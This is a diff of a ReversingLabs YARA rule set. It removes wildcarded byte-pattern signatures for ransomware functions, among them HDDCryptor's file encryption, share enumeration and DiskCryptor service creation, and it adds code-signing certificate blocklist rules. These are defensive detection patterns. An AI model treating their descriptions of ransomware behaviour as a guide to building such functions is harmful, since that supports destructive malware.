-            E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24
-            ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44
-            24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24 ?? 89 4C 24 ?? C7 04 24 ?? ?? ?? ?? 8B 94 24 ??
-            ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ??
-            C7 44 24 ?? ?? ?? ?? ?? 8B 74 24 ?? 89 74 24 ?? 8B 74 24 ?? 89 74 24 ?? E8 ?? ?? ??
-            ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 94 24 ?? ?? ?? ?? 89 14 24 8B
-            5C 24 ?? 89 5C 24 ?? 8B 2D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 6C 24
-            ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 0F 84 ?? ?? ?? ?? 8B
-            84 24 ?? ?? ?? ?? 85 C0 0F 86 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 0F B6 08 83 C1 ?? 88
-            4C 24 ?? 0F B6 08 83 C1 ?? 88 4C 24 ?? 8D 0D ?? ?? ?? ?? 89 0C 24 8B 15 ?? ?? ?? ??
-            89 54 24 ?? 8D 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8D 51 ?? 8B
-            18 8B 40 ?? 39 C2 0F 8F ?? ?? ?? ?? 89 9C 24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D
-        }
-		$find_files_p4 = {
-            6C CB ?? 8B 74 24 ?? 89 75 ?? 8B 2D ?? ?? ?? ?? 8D 0C CB 85 ED 75 ?? 8B 6C 24 ?? 89
-            29 8D 05 ?? ?? ?? ?? 89 04 24 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 8D 4C 24 ?? 89 4C 24 ??
-            E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 48 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ??
-            ?? 85 C9 75 ?? 8B 8C 24 ?? ?? ?? ?? 89 08 8B 6C 24 ?? 8B 4C 24 ?? 8B B4 24 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89
-            0C 24 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89 4C 24 ?? 8D 2D ?? ?? ?? ?? 89
-            2C 24 89 5C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 8B
-            44 24 ?? 8B 4C 24 ?? 8D 50 ?? 89 C8 8B 4C 24 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ??
-            89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ??
-            ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B
-            44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 85 C0
-            0F 86 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 0F B6 08 88 4C 24 ?? 0F B6 08 88 4C 24 ?? 8D
-        }
-		$find_files_p5 = {
-            0D ?? ?? ?? ?? 89 0C 24 8B 15 ?? ?? ?? ?? 89 54 24 ?? 8D 54 24 ?? 89 54 24 ?? E8 ??
-            ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8D 51 ?? 8B 18 8B 40 ?? 39 C2 0F 8F ?? ?? ?? ?? 89 9C
-            24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D 6C CB ?? 8B 74 24 ?? 89 75 ?? 8B 2D ?? ??
-            ?? ?? 8D 0C CB 85 ED 75 ?? 8B 6C 24 ?? 89 29 8D 05 ?? ?? ?? ?? 89 04 24 8B 0D ?? ??
-            ?? ?? 89 4C 24 ?? 8D 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89
-            48 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 8B 8C 24 ?? ?? ?? ?? 89 08
-            E9 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ??
-            ?? 89 0C 24 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89 4C 24 ?? 8D 2D ?? ?? ??
-            ?? 89 2C 24 89 5C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24
-            ?? 8B 44 24 ?? 8B 4C 24 ?? 8D 50 ?? 89 C8 8B 4C 24 ?? E9 ?? ?? ?? ?? 89 AC 24 ?? ??
-            ?? ?? 89 8C 24 ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            84 24 ?? ?? ?? ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 8C 24 ?? ?? ??
-            ?? 89 84 24 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 E8
-        }
-		$encrypt_files_p1 = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC
-            ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
-            ?? ?? ?? ?? 8B 40 ?? 89 04 24 8D 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 84
-            24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8D 15 ?? ?? ?? ?? 39 CA 0F 85 ?? ?? ?? ?? 8B 48
-            ?? 89 4C 24 ?? 8B 00 89 84 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24
-            ?? 8B 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 44
-            24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? C6 44 24 ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 8D 54 24 ?? 89 54 24 ?? 8B 94 24 ?? ?? ?? ??
-            89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8D AC 24 ?? ?? ?? ?? 89 6C 24 ?? 89 4C 24 ?? 89
-            44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F
-            85 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? C7 44 24 ?? ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ??
-            85 D2 0F 85 ?? ?? ?? ?? 89 44 24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 0D ?? ?? ??
-            ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24
-            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 85 D2 0F 85 ?? ??
-            ?? ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8
-        }
-		$encrypt_files_p2 = {
-            85 C0 0F 85 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 54
-            24 ?? 89 54 24 ?? 89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C
-            24 ?? 85 C9 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ??
-            89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ??
-            8B 5C 24 ?? 85 C9 0F 85 ?? ?? ?? ?? 89 1C 24 89 54 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B
-            4C 24 ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ??
-            8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 15 ?? ?? ?? ?? 8B 1D ?? ?? ??
-            ?? 8B 2D ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ??
-            89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24
-            ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 89 1C 24 8B 6C 24 ?? 89 6C 24 ??
-            8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 31 C0 EB ?? 8B 4C 24 ?? 8B 54 24 ?? 8D 04 0A 89 44 24 ??
-            8B 4C 24 ?? 89 0C 24 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 6C
-            24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B
-            54 24 ?? 89 54 24 ?? 85 C9 74 ?? 8B 1D ?? ?? ?? ?? 39 D9 0F 85 ?? ?? ?? ?? 89 0C 24
-        }
-		$encrypt_files_p3 = {
-            89 54 24 ?? 8B 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 0F 84
-            ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? 89 4C 24 ?? E8 ?? ??
-            ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 39 EB 0F 87 ?? ??
-            ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 74 24 ?? 8B 7E ?? 89 44 24 ?? 89 4C 24
-            ?? 89 54 24 ?? 8B B4 24 ?? ?? ?? ?? 89 74 24 ?? 89 5C 24 ?? 89 6C 24 ?? 8B 6C 24 ??
-            89 2C 24 FF D7 8B 44 24 ?? 8B 48 ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ??
-            8B 6C 24 ?? 89 6C 24 ?? 8B 74 24 ?? 89 34 24 FF D1 8B 44 24 ?? 89 04 24 8B 4C 24 ??
-            89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 4C 24 ?? 39 C1 0F 85 ?? ?? ?? ?? 89
-            0C 24 8B 44 24 ?? 89 44 24 ?? 8B 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 0F B6 44
-            24 ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 44 24 ?? 89 44 24 ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 44 24 ?? B9 ?? ?? ?? ?? F7 E9 8B 44 24 ?? 01 C2 C1 F8 ?? C1 FA ?? 29 C2 89 D0
-            89 D3 F7 E9 8D 04 13 C1 F8 ?? C1 FB ?? 29 D8 83 C0 ?? 89 44 24 ?? 31 C9 EB ?? 8B 54
-            24 ?? 8D 4A ?? 8B 44 24 ?? 39 C1 7D ?? 89 4C 24 ?? 8B 44 24 ?? 89 04 24 8D 0D ?? ??
-            ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? 90
-            E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 90
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "2a:6b:2d:f2:10:be:14:f4:e1:8e:10:c7" and 1472095404 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_412Ab2A50E8028Ddcbc499Ddf45F2045 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "aabb3a66-5677-5359-9d81-92c8d4c7d910"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14566-L14582"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a5b85d13dee51d68af28394ecee3dcc2efe7add4d26c2a8033d1855b33ac6271"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ding Ruan" and pe.signatures [ i ] . serial == "41:2a:b2:a5:0e:80:28:dd:cb:c4:99:dd:f4:5f:20:45" and 1479340800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Hddcryptor : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0747F6A8C3542F954B113Fd98C7607Cf : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects HDDCryptor ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2c6a8ca3-0f7a-52b7-af6d-74fa9407feca"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "de5fbb40-7d41-5f3e-97c9-a6882c19ebb5"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.HDDCryptor.yara#L1-L157"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "47915f315bb4956507362f56024f5632cb1bcec569ceaf77fe9d7cb9c25d1d8a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14584-L14600"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9d5e5c98f3ef372532cfc4f544d5d3f620dc2e49d8b6e1c96df29d2a38042019"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HDDCryptor"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$deploy_components = {
-            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 6A ?? 53 0F 85 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 8B CB 8B F0 E8 ?? ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ??
-            ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB
-            E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ??
-            ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB 8B F0 E8 ??
-            ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B
-            F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F8 6A ?? 0F
-            AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B F8 BA ?? ?? ??
-            ?? 0F AF FE 8B CB E8
-        }
-		$get_shares_info = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? EB ?? FF 15 ?? ??
-            ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 8D 44 24 ?? 50 C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            FF 15
-        }
-		$encrypt_discs = {
-            68 ?? ?? ?? ?? FF 74 24 ?? 0F 57 C0 66 0F 7F 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 33 C9 EB ?? 8D 49 ?? 0F B7 81 ?? ?? ?? ?? 66 89 84 0C ?? ?? ?? ?? 8D 49 ?? 66
-            85 C0 75 ?? 8D 8C 24 ?? ?? ?? ?? 83 C1 ?? 66 8B 41 ?? 8D 49 ?? 66 85 C0 75 ?? A1 ??
-            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41
-            ?? A1 ?? ?? ?? ?? 89 41 ?? 0F B7 05 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 66 89 41
-            ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            D7 B9 ?? ?? ?? ?? E8
-        }
-		$create_diskcryptor_service = {
-            83 EC ?? 53 55 56 57 68 ?? ?? ?? ?? 33 ED 8B F2 55 55 8B F9 FF 15 ?? ?? ?? ?? 85 C0
-            74 ?? 55 55 55 55 55 FF 74 24 ?? 55 6A ?? 5B 53 6A ?? 68 ?? ?? ?? ?? 56 57 50 FF 15
-            ?? ?? ?? ?? 8B F0 89 5C 24 ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 33
-            C9 89 44 24 ?? 41 8D 44 24 ?? 89 4C 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 53 56 89 4C 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? FF 15 ?? ?? ?? ?? 8B C6 5F 5E 5D 5B 83 C4 ??
-            C3
-        }
-		$extract_diskcryptor_from_resources = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 8B B4 24 ?? ??
-            ?? ?? 33 C0 57 50 89 54 24 ?? 8B E9 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B D8 56
-            0F B7 C9 51 53 FF 15 ?? ?? ?? ?? 8B F0 56 53 FF 15 ?? ?? ?? ?? 56 53 8B F8 FF 15 ??
-            ?? ?? ?? 57 89 44 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B F0 E8 ?? ?? ?? ?? 59 FF 74
-            24 ?? 8B D8 56 53 E8 ?? ?? ?? ?? 8B 54 24 ?? 33 FF 83 C4 ?? 8B CF 85 D2 7E ?? 8A 04
-            19 3C ?? 7C ?? 3C ?? 7F ?? 04 ?? 3C ?? 76 ?? 2C ?? 88 04 19 41 3B CA 7C ?? 33 C0 68
-            ?? ?? ?? ?? 66 89 44 24 ?? 8D 44 24 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F5 66 8B 45
-            ?? 83 C5 ?? 66 3B C7 75 ?? 8D 7C 24 ?? 2B EE 83 EF ?? 33 C9 66 8B 47 ?? 83 C7 ?? 66
-            3B C1 75 ?? 8B CD C1 E9 ?? F3 A5 8B CD 83 E1 ?? F3 A4 8D 7C 24 ?? 83 EF ?? 33 ED 66
-            8B 47 ?? 8D 7F ?? 66 3B C5 75 ?? A1 ?? ?? ?? ?? 8B 54 24 ?? 8B F2 89 07 66 8B 02 83
-            C2 ?? 66 3B C5 75 ?? 8D 7C 24 ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C5 75 ??
-            8B CA 8D 44 24 ?? C1 E9 ?? F3 A5 55 55 6A ?? 55 55 8B CA 83 E1 ?? 68 ?? ?? ?? ?? F3
-            A4 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 55 8D 44 24 ?? 50 FF 74 24 ?? 53 56 FF
-            15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 33 C0 40 EB ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33
-            C0 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_files_using_diskcryptor_p1 = {
-            55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ??
-            ?? ?? 64 A3 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 83 7D ?? ?? 73 ?? B9
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 8B 75 ?? BA ?? ?? ?? ?? 8B 4E ?? 8A 01 41 88 02 42 84 C0 75 ?? 8B 4E ?? BA
-            ?? ?? ?? ?? 8A 01 41 88 02 42 84 C0 75 ?? 6A ?? 59 BE ?? ?? ?? ?? C7 05 ?? ?? ?? ??
-            ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ??
-            33 F6 8D 84 24 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 89 B4 24 ?? ?? ?? ??
-            8D 4C 24 ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4C 24 ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 7C 24 ?? ?? 8D 44 24 ?? 56 0F 43 44 24 ?? 56 6A ?? 56 56 68 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 33 DB C7 44
-        }
-		$encrypt_files_using_diskcryptor_p2 = {
-            24 ?? ?? ?? ?? ?? 50 89 5C 24 ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B D0 59 59 85 D2
-            75 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 59 8B D0 8D BC 24 ?? ?? ?? ?? 83 EF ?? 66
-            8B 47 ?? 8D 7F ?? 66 3B C3 75 ?? A1 ?? ?? ?? ?? 83 C2 ?? 89 07 8B F2 66 8B 02 83 C2
-            ?? 66 3B C3 75 ?? 8D BC 24 ?? ?? ?? ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C3
-            75 ?? 8B CA 8D 84 24 ?? ?? ?? ?? C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 51 50 83 EC ??
-            8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 84
-            24 ?? ?? ?? ?? ?? 83 7E ?? ?? 72 ?? 8B 36 83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 8B D6 8B C8
-            E8 ?? ?? ?? ?? 59 59 53 6A ?? 8D 4C 24 ?? 8B F0 E8 ?? ?? ?? ?? 53 6A ?? 8D 4C 24 ??
-            C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 74 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8
